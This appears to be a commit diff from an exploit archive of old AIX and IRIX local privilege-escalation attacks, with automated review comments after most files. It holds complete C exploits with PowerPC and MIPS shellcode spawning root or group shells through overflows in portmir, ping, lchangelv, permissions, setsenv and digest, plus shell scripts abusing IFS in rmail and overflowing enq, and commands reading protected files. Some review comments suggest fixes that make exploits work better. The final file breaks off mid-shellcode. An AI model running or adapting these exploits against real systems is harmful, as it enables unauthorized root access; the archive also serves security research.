send_environ(buffer,param);
sprintf(buffer,"%s","TZ=NFT-1");
send_environ(buffer,param);
sprintf(buffer,"%s","A__z=! LOGNAME");
send_environ(buffer,param);
/* Start info_gr with -q parameter or the process will be run locally and
not from the daemon ... */
sprintf(buffer,"%c%c%c%c",1,45,113,0);
fwrite(buffer,1,4,param);
fclose(param);
param=fopen("/tmp/tempo.fun","rb");
fseek(param,0,SEEK_END);
taille_param=ftell(param);
fseek(param,0,SEEK_SET);
fread(paramz,1,taille_param,param);
fclose(param);
unlink("/tmp/tempo.fun");
/* Thank you Mr daemon :) */
write(chaussette,paramz,taille_param);
printf("\n%s %s\n",OK,getenv("HOSTNAME"));
close(chaussette);
}
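Review bot: the comment `/* If we send our pts, info_gr will crash as it has already changed UID *` is closed by a lone `/` on the next line; `*` followed by a newline and `/` is not a comment terminator, so the comment runs on to the `*/` after `good for debugging :)` and swallows `send_environ("/dev/null",param);`. Please check whether this is an archive line-wrap or the original file. Also: `strcpy(buffer,getenv("DISPLAY"))` and the `sprintf(buffer,"...=%s",getenv(...))` lines for `LANG`, `NLSPATH`, `HOSTNAME`, `LOCPATH`, `AUTHSTATE`, `SHELL` and `DISPLAY` pass unchecked `getenv` results and fault when a variable is unset; `bzero` needs `<strings.h>`, which is not included; `main` has no return type; and `/tmp/tempo.fun` is a fixed-name scratch file.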


@ -0,0 +1,5 @@
source: https://www.securityfocus.com/bid/375/info
The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file.
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.
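Review bot: typos in the advisory text: `utlitiy` for `utility`, `tested on on AIX 4.2.1`, `loggs` for `logs`, and the run-on `/tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack` is missing its subject (`... so a local user may ...`). The entry is prose only, with no PoC file, and the affected release appears only in the parenthetical `(tested on on AIX 4.2.1)`; a leading version line would match the other entries.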


@ -0,0 +1,72 @@
/*
source: https://www.securityfocus.com/bid/385/info
AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information.
*/
/*## copyright LAST STAGE OF DELIRIUM oct 2000 poland *://lsd-pl.net/ #*/
/*## /usr/bin/portmir #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
#define ADRNUM 400
#define NOPNUM 16000
#define ALLIGN 2
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh\xff"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM oct 2000 poland //lsd-pl.net/\n");
printf("/usr/sbin/portmir for aix 4.2 4.3 4.3.x PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 42: shellcode[55]=0x02; break;
case 43: shellcode[55]=0x04; break;
case 433: shellcode[55]=0x03; break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=&buffer[1000];
envp[1]=0;
b=buffer;
for(i=0;i<ALLIGN;i++) *b++=adr[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[1000];
sprintf(b,"xxx=");b+=4;
for(i=0;i<ALLIGN;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
execle("/usr/sbin/portmir","lsd","-t",buffer,0,envp);
}
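Review bot: the header comment names `/usr/bin/portmir` while both the `printf` banner and the `execle` call use `/usr/sbin/portmir`; one of the two paths is wrong and the header should match the call. No headers are included, so `printf`, `strlen`, `sprintf`, `atoi`, `exit` and `execle` are implicitly declared and `main` has no return type. The description has `vulnerabilites`, `it's log files` (its), `world readable directly` (directory) and `relavent`.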

104
exploits/aix/local/19307.c Normal file

@ -0,0 +1,104 @@
// source: https://www.securityfocus.com/bid/387/info
A buffer overflow condition exists in some versions of /usr/sbin/ping under AIX. Given that ping is SUID root, this overflow allows malicious users to gain root from it.
/*
*
* /usr/sbin/ping exploit (kinda' coded) by BeastMaster V
*
* CREDITS: this is simpy a modified version of an exploit
* posted by Georgi Guninski (guninski@hotmail.com)
*
* This will give a #rootshell# by overwriting a buffer
* in /usr/sbin/ping while ping is setuid to root.
* This exploit is designed for AIX 4.x on PPC platform.
*
*
* USAGE:
* $ cc -o foo -g aix_ping.c
* $ ./foo 5100
* #
*
*
* HINT: Try giving ranges from 5090 through 5500
*
* DISCLAIMER: use this program in a responsible manner.
*
* --> don't forget to visit http://www.rootshell.com
* --> for more goodies :-)
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
extern int execv();
#define MAXBUF 600
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
main(int argc,char **argv,char **env)
{
unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
int min=100, max=280;
unsigned int return_address;
char *newenv[8];
char *args[4];
int offset=5300;
if (argc==2) offset = atoi(argv[1]);
pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
*((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff)
;
*((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff
);
return_address=(unsigned)&buf[0]+offset;
for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
for(i=0;i<max-1;i++) frame[i]=return_address;
frame[i]=0;
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]="ping";
args[1]=(char*)&frame[0];
execve("/usr/sbin/ping",args,newenv);
perror("Error executing execve \n");
}
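Review bot: line 2 of the file (the description following `// source:`) is bare text outside the `/* ... */` block that starts on line 3, so the file does not compile as archived; prefix it with `//` like the line above or fold it into the comment. `<unistd.h>` is missing (the sibling 19309.c includes it), `main` has no return type, and `i=nop+strlen( (char*) &code)/4-1;` is a dead store that the next line, `for(i=0;i<max-1;i++) frame[i]=return_address;`, immediately overwrites.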

101
exploits/aix/local/19309.c Normal file

@ -0,0 +1,101 @@
/*
source: https://www.securityfocus.com/bid/389/info
A buffer overflow can occur in lchangelv under some versions of AIX. Note that an attacker must already have the GID or EGID of 'system' to execute lchangelv.
Because lchangelv is SUID root, this overflow will grant the attacker root privileges.
*/
/*
*
* /usr/sbin/lchangelv (kinda' coded) by BeastMaster V
*
* CREDITS: this is simply a modified version of an exploit
* posted by Georgi Guninski (guninski@hotmail.com)
*
* NOTES: you must have gid or egid of (system) to run this.
*
* USAGE:
* $ cc -o foo -g aix_lchangelv.c
* $ ./foo 5100
* #
*
*
* HINT: Try giving ranges from 5090 through 5500
*
* DISCLAIMER: use this program in a responsible manner.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
extern int execv();
#define MAXBUF 600
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
main(int argc,char **argv,char **env)
{
unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
int min=100, max=280;
unsigned int return_address;
char *newenv[8];
char *args[4];
int offset=3200;
if (argc==2) offset = atoi(argv[1]);
pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
*((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff);
return_address=(unsigned)&buf[0]+offset;
for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
for(i=0;i<max-1;i++) frame[i]=return_address;
frame[i]=0;
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]="lchangelv";
args[1]="-l";
args[2]=(char*)&frame[0];
execve("/usr/sbin/lchangelv",args,newenv);
perror("Error executing execve \n");
}
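Review bot: this is the same BeastMaster V template as 19307.c (identical `code[]`, `createvar`, environment setup, and the same dead-store `i=nop+strlen(...)` line followed by `for(i=0;...)`), changed only in `offset=3200`, the `-l` argument and the `/usr/sbin/lchangelv` target; a cross-reference to 19307.c and to the Guninski original in each header would help anyone maintaining the shared code. Unlike 19307.c this copy does include `<unistd.h>` and keeps its description inside the comment, so it compiles as stored.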

113
exploits/aix/local/19318.c Normal file

@ -0,0 +1,113 @@
// source: https://www.securityfocus.com/bid/417/info
A buffer overrun exists in the permissions program, as shipped by Silicon Graphics with the 5.x and 6.x Irix operating system. By supplying a long, well crafted buffer as the 4th argument to the program, arbitrary code can be executed as group sys.
/* /usr/lib/desktop/permissions exploit by DCRH 26/5/97
*
* This gives you egid = sys
*
* Tested on: R8000 Power Challenge (Irix64 6.2)
*
* Exploit doesn't work on Irix 5.x due to stack position
*
* compile as: cc -n32 perm.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#define NUM_ADDRESSES 400
#define BUF_LENGTH 700
#define EXTRA 500
#define OFFSET 0x200
#define GP_OFFSET 31612
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */
#define u_long unsigned
u_long get_sp_code[] = {
0x03a01025, /* move $v0,$sp */
0x03e00008, /* jr $ra */
0x00000000, /* nop */
};
u_long irix_shellcode[] = {
0x24041234, /* li $4,0x1234 */
0x2084edcc, /* sub $4,0x1234 */
0x0491fffe, /* bgezal $4,pc-4 */
0x03bd302a, /* sgt $6,$sp,$sp */
0x23e4012c, /* addi $4,$31,264+36 */
0xa086feff, /* sb $6,-264+7($4) */
0x2084fef8, /* sub $4,264 */
0x20850110, /* addi $5,$4,264+8 */
0xaca4fef8, /* sw $4,-264($5) */
0xaca6fefc, /* sw $4,-260($5) */
0x20a5fef8, /* sub $5, 264 */
0x240203f3, /* li $v0,1011 */
0x03ffffcc, /* syscall 0xfffff */
0x2f62696e, /* "/bin" */
0x2f7368ff, /* "/sh" */
};
char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];
void main(int argc, char **argv)
{
char *env[] = {NULL};
u_long targ_addr, stack, tmp;
u_long *long_p;
int i, code_length = strlen((char *)irix_shellcode)+1;
u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;
stack = get_sp();
if (stack & 0x80000000) {
printf("Recompile with the '-n32' option\n");
exit(1);
}
long_p =(u_long *) buf;
targ_addr = stack + OFFSET;
if (argc > 1)
targ_addr += atoi(argv[1]) * 4;
if (targ_addr + GP_OFFSET > 0x80000000) {
printf("Sorry - this exploit for Irix 6.x only\n");
exit(1);
}
tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;
while ((tmp & 0xff000000) == 0 ||
(tmp & 0x00ff0000) == 0 ||
(tmp & 0x0000ff00) == 0 ||
(tmp & 0x000000ff) == 0)
tmp += 4;
for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
*long_p++ = tmp;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = IRIX_NOP;
for (i = 0; i < code_length/sizeof(u_long); i++)
*long_p++ = irix_shellcode[i];
tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = (tmp << 16) | (tmp >> 16);
*long_p = 0;
printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);
execle("/usr/lib/desktop/permissions", "permissions",
"-display", getenv("DISPLAY"), "/bin/ls", buf, 0, env);
perror("execl failed");
}
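Review bot: this is an IRIX exploit for `/usr/lib/desktop/permissions` (`compile as: cc -n32 perm.c`, MIPS shellcode, the message `Sorry - this exploit for Irix 6.x only`) filed under exploits/aix/local; the platform should be IRIX. As in 19214.c, 19226.c and 19307.c, line 2 (the description after `// source:`) is bare text and the file will not compile as stored. `void main` is non-standard, and casting the `get_sp_code[]` data array to a function pointer at `u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;` depends on an executable data segment.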

29
exploits/aix/local/19344.sh Executable file

@ -0,0 +1,29 @@
#source: https://www.securityfocus.com/bid/454/info
#
#Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs.
#
#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994
# Setup needed files.
mkdir /tmp/.rmail
cd /tmp/.rmail
cat << EOF > usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .
# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh
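Review bot: `#!/bin/csh` is the fifth line of the file, after the `#source:` comment block, so it is not an interpreter line at all; run as `./19344.sh` the script is handed to the caller's shell, where `setenv PATH .:$PATH`, `setenv IFS /` and `unsetenv IFS` are not Bourne or ksh builtins and fail, leaving IFS untouched and the hole untriggered. Move `#!/bin/csh` to line 1 (or state in the comments that it must be run as `csh 19344.sh`).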

@ -0,0 +1,6 @@
source: https://www.securityfocus.com/bid/455/info
There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format.
/usr/sbin/lquerypv -h /pathtofilename

@ -0,0 +1,7 @@
source: https://www.securityfocus.com/bid/468/info
The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vulnerability. sgihelp contains an option that allows a user to print to a command. Certain SGI utilities, including PrintStatus, printers, scanners, and a number of others, will call this program without changing their uid to the users, from roots. As such, arbitrary commands can be executed as root using the 'print to command' option of sgihelp.
Run PrintStatus
Press the 'help' button.
Select the 'print to command' option. This will allow you to execute anything as root.

@ -0,0 +1,6 @@
source: https://www.securityfocus.com/bid/1660/info
A vulnerability exists in versions 4.x. x of AIX, from IBM. Any local user can utilize the -Z command to netstat, without needing to be root. This will cause interface statistics to be reset. This could potentially interfere with programs that track statistical information.
$ netstat -in --> shows stats
$ netstat -Zi --> clears them without checking the uid

@ -0,0 +1,6 @@
source: https://www.securityfocus.com/bid/1800/info
A vulnerability exists in AIX 3.* versions of bugfiler, a utility which automates the process of reporting an filing system bugs. Bugfiler, installed setuid root, creates files in a directory specified by the user invoking the program (example: $/lib/bugfiler -b <user> directory>). It may be possible for an attacker to create files in arbitrary directories that are owned by attacker-specified users. This may result in an elevation of privileges for the attacker. Further technical details about this vulnerability are not known.
$whoami eviluser
$/lib/bugfiler -b <user> <directory> creates funny files under the <user>-owned <directory> and that may be used by crackers to increase privileges. See the manpage of bugfiler for more information. (bugfiler does not work for some <user>s)
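Review bot: the description's example `$/lib/bugfiler -b <user> directory>` has dropped the opening bracket of the directory placeholder that the repro line below keeps as `<user> <directory>`, and in both `$whoami eviluser` and `$/lib/bugfiler ...` the prompt, the command and (in the first case) its output are run together. Separating them (`$ whoami` on one line, `eviluser` on the next) would make the transcript readable.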

@ -0,0 +1,80 @@
/*
source: https://www.securityfocus.com/bid/2032/info
AIX is a version of the UNIX Operating System distributed by IBM. A problem exists that could allow a user elevated priviledges.
The problem occurs in the setsenv binary. It has been reported that a buffer overflow exists in this binary which could allow a user to overwrite variables on the stack, including the return address. This makes it possible for a malicious user to execute arbitrary code, and potentially attain a UID of 0.
*/
/*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/
/*## /usr/bin/setsenv #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
#define ADRNUM 200
#define NOPNUM 16000
char setreuidcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <setreuidcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe0" /* lbz r2,-288(r21) */
"\x7e\x83\xa3\x78" /* mr r3,r20 */
"\x3a\xd5\xfe\xe4" /* cal r22,-284(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xff\xff\xff\xff"
"\x38\x75\xff\x04" /* cal r3,-252(r21) */
"\x38\x95\xff\x0c" /* cal r4,-244(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x0c" /* st r3,-244(r21) */
"\x92\x95\xff\x10" /* st r20,-240(r21) */
"\x88\x55\xfe\xe1" /* lbz r2,-287(r21) */
"\x9a\x95\xff\x0b" /* stb r20,-245(r21) */
"\x4b\xff\xff\xd8" /* bl <setreuidcode+32> */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM sep 2000 poland //lsd-pl.net/\n");
printf("/usr/bin/setsenv for aix 4.1 4.2 4.3 4.3.x PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 41|42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 41: memcpy(&setreuidcode[40],"\x68\x03",2); break;
case 42: memcpy(&setreuidcode[40],"\x71\x02",2); break;
case 43: memcpy(&setreuidcode[40],"\x82\x04",2); break;
case 433: memcpy(&setreuidcode[40],"\x92\x03",2); break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=&buffer[1000];
envp[1]=0;
b=buffer;
strcpy(b,"lsd=");b+=4;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[1000];
sprintf(b,"xxx= ");b+=7;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
*b=0;
execle("/usr/bin/setsenv","lsd",buffer,0,envp);
}
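Review bot: `sprintf(b,"xxx= ");b+=7;` writes five bytes but advances the pointer by seven, so two bytes of the uninitialised automatic array `buffer[20000]` sit inside the environment string between `xxx= ` and the NOP sled; if either happens to be NUL the string ends there and neither the sled nor the shellcode is placed. If the two bytes are meant as alignment padding, write them explicitly (`sprintf(b,"xxx=   ");b+=7;`), as the digest and piobe exploits in this commit do with their `' '` padding loops. The file also has no `#include` lines and declares `main(int argc,char **argv,char **e)` with an implicit return type; it needs `<stdio.h>`, `<string.h>`, `<stdlib.h>` and `<unistd.h>` to build cleanly.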

@ -0,0 +1,88 @@
/*
source: https://www.securityfocus.com/bid/2033/info
AIX is a version of the UNIX Operating System distributed by IBM. A vulnerability exists in the operating system which could allow a user an elevation in priviledge.
The problem occurs in the digest binary. It is reported that it is possible to overflow a buffer in the program and overwrite a pointer to the stack, which in turn can result in an overflow in a library referenced by the binary. The secondary overflow in the library makes it possible to overwrite other stack variables, including the return address.
A malicious user could use this vulnerability to gain an elevation in priviledges, and potentially UID 0.
*/
/*## copyright LAST STAGE OF DELIRIUM dec 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/digest #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
/* printq group to root user's privilages escalation attack */
/* use aix_piomkapqd or aix_piobe codes first in order to gain egid=printq */
#define PCHNUM 2200
#define ADRNUM 8000
#define NOPNUM 8000
#define ALLIGN 2
char setreuidcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <setreuidcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe0" /* lbz r2,-288(r21) */
"\x7e\x83\xa3\x78" /* mr r3,r20 */
"\x3a\xd5\xfe\xe4" /* cal r22,-284(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xff\xff\xff\xff"
"\x38\x75\xff\x04" /* cal r3,-252(r21) */
"\x38\x95\xff\x0c" /* cal r4,-244(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x0c" /* st r3,-244(r21) */
"\x92\x95\xff\x10" /* st r20,-240(r21) */
"\x88\x55\xfe\xe1" /* lbz r2,-287(r21) */
"\x9a\x95\xff\x0b" /* stb r20,-245(r21) */
"\x4b\xff\xff\xd8" /* bl <setreuidcode+32> */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],pch[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/lpd/digest for aix 4.1 4.2 4.3 PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 41|42|43\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 41: memcpy(&setreuidcode[40],"\x68\x03",2); break;
case 42: memcpy(&setreuidcode[40],"\x71\x02",2); break;
case 43: memcpy(&setreuidcode[40],"\x82\x04",2); break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000-2300;
*((unsigned long*)pch)=(unsigned long)e+(i&~3)-2300;
envp[0]=&buffer[3000];
envp[1]=0;
b=buffer;
for(i=0;i<ALLIGN;i++) *b++=' ';
for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
*b=0;
b=&buffer[3000];
sprintf(b,"xxx= ");b+=5;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
execle("/usr/lib/lpd/digest","lsd",buffer,"lsd",0,envp);
}
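Review bot: `i=0; while(*e++) i+=strlen(*e)+1;` tests `*e` and increments before the body runs, so the body measures the string after the one just tested: the first environment string is never counted, and the final pass calls `strlen()` on the NULL that terminates the array, which only works where a read of address 0 does not fault. `while(*e) i+=strlen(*e++)+1;` counts every string and stops at the terminator; the resulting shift in `(unsigned long)e+(i&~3)-8000-2300` is a few bytes, well inside the 8000-word NOP sled. The same loop is copied verbatim into the setsenv, piobe and piomkapqd sources in this commit. As there, no headers are included and `main` has an implicit return type.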

58
exploits/aix/local/20454.sh Executable file
@ -0,0 +1,58 @@
source: https://www.securityfocus.com/bid/2034/info
AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges.
The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to the overwriting of variables on the stack. This creates the potential for a malicious user to execute arbitrary code, and possibly gain administrative access.
#!/bin/sh
# FileName: ex_enq_aix4x.sh
# Exploit "enq & qstatus" of Aix4.x to get egid=9 shell.
# Usage : chmod ex_enq_aix4x.sh ; ./ex_enq_aix4x.sh
# Tested : on Aix4.3.3
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-24
# Announce: use as your owner risk!
PERL=/usr/bin/perl
TMP=/tmp/.env.tmp
SHPL=/tmp/.sh.pl
cat >$SHPL<<EOF
#!/usr/bin/perl
\$BUFF="";
\$BUFF.="\x7c\xa5\x2a\x79"x500;
\$OSLEVEL=\`/usr/bin/oslevel\`;
\$ID="\x04";
if( \$OSLEVEL=~/4\.1/ ) {
\$ID="\x03";
} elsif(\$OSLEVEL=~/4\.3\.3/) {
\$ID="\x03";
} elsif( \$OSLEVEL=~/4\.2/ ) {
\$ID="\x02";
}
\$BUFF.="\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6";
\$BUFF.="\x3b\xff\x01\x20\x38\x7f\xff\x08\x38\x9f\xff\x10";
\$BUFF.="\x90\x7f\xff\x10\x90\xbf\xff\x14\x88\x5f\xff\x0f";
\$BUFF.="\x98\xbf\xff\x0f\x4c\xc6\x33\x42\x44\xff\xff\x02";
\$BUFF.="/bin/sh";
\$BUFF.=\$ID;
print \$BUFF;
EOF
env | awk -F = '{print "unset "$1;}'|grep -v LOGNAME > $TMP
. $TMP
/bin/rm -f $TMP
CC=A`$PERL $SHPL` ; export CC
/bin/rm -f $SHPL
/usr/bin/enq -w"`perl -e 'print "\x2f\xf2\x2b\x10"x600'`"
#EOF
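Review bot: the first three lines (`source: https://www.securityfocus.com/bid/2034/info` and the two description sentences) carry no `#`, so a shell executes them as commands before it reaches `#!/bin/sh` on the fourth line, and that interpreter line, not being line 1, is ignored anyway; prefix the header with `#` the way the rmail script in this commit does and put the shebang first. Two further points: after `. $TMP` has unset every variable except LOGNAME, PATH included, the last line still calls bare `perl` inside `/usr/bin/enq -w"..."` and so relies on the shell's default search path, although `PERL=/usr/bin/perl` was defined for exactly this situation; use `$PERL` there too. The usage comment `chmod ex_enq_aix4x.sh` is also missing its mode (`chmod +x`).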

@ -0,0 +1,80 @@
/*
source: https://www.securityfocus.com/bid/2037/info
AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists which can allow a local user elevated priviledges.
The problem exists in the piobe program. Due to the insuffient handling of the PIOSTATUSFILE, PIOTITLE, and PIOVARDIR environment variables, it's possible to overwrite stack variables. This makes it possible for a malicious user to pass specially formatted strings to the program via environment variables, and potentially gain administrative access.
*/
/*## copyright LAST STAGE OF DELIRIUM dec 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/piobe #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
/* this code gives privilages of a printq group and command shell (without */
/* a prompt). from that point euid=root can be gained with the use of our */
/* aix_piodmgrsu or aix_digest codes */
#define ADRNUM 3000
#define NOPNUM 16000
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
